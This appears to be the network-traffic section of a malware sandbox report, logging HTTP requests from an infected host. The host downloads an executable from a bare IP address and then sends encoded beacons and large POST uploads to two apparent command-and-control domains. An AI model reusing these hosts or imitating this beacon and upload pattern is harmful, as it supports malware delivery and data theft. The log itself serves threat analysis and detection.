Network Analysis

GET /_errorpages/defounderzx.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: 2.59.254.18 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 04 Aug 2023 00:08:26 GMT Server: Apache Last-Modified: Tue, 01 Aug 2023 15:49:52 GMT ETag: "97000-601de7f74cd61" Accept-Ranges: bytes Content-Length: 618496 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream

GET /fd62/?JjUdE2=ghnUtiMEyEw2O5h1P7vo9Byhe/usWh543+65PpmWc9PRh4YewV0BtpdKaxjHtlCT/jMo+a/V&t8o=FrFL&sql=1 HTTP/1.1 Host: www.sdxgwnkf.cfd Connection: close

HTTP/1.1 200 OK Server: nginx Date: Fri, 04 Aug 2023 00:10:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding

POST /fd62/ HTTP/1.1 Host: www.sdxgwnkf.cfd Connection: close Content-Length: 3416 Cache-Control: no-cache Origin: http://www.sdxgwnkf.cfd User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.sdxgwnkf.cfd/fd62/ Accept-Language: en-US Accept-Encoding: gzip, deflate

POST /fd62/ HTTP/1.1 Host: www.sdxgwnkf.cfd Connection: close Content-Length: 267004 Cache-Control: no-cache Origin: http://www.sdxgwnkf.cfd User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.sdxgwnkf.cfd/fd62/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /fd62/?JjUdE2=xn0HKfGIZzHBtebtM2PJoTiRmP7tmvS0K83HwlewIFGHtZl2UfwiPMnZWATjhy2Ku2mJdV27&t8o=FrFL&sql=1 HTTP/1.1 Host: www.soc34m.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 04 Aug 2023 00:10:21 GMT Content-Type: text/html Content-Length: 291 ETag: "64cc3fd9-123" Via: 1.1 google Connection: close

POST /fd62/ HTTP/1.1 Host: www.soc34m.com Connection: close Content-Length: 3416 Cache-Control: no-cache Origin: http://www.soc34m.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.soc34m.com/fd62/ Accept-Language: en-US Accept-Encoding: gzip, deflate

POST /fd62/ HTTP/1.1 Host: www.soc34m.com Connection: close Content-Length: 267004 Cache-Control: no-cache Origin: http://www.soc34m.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.soc34m.com/fd62/ Accept-Language: en-US Accept-Encoding: gzip, deflate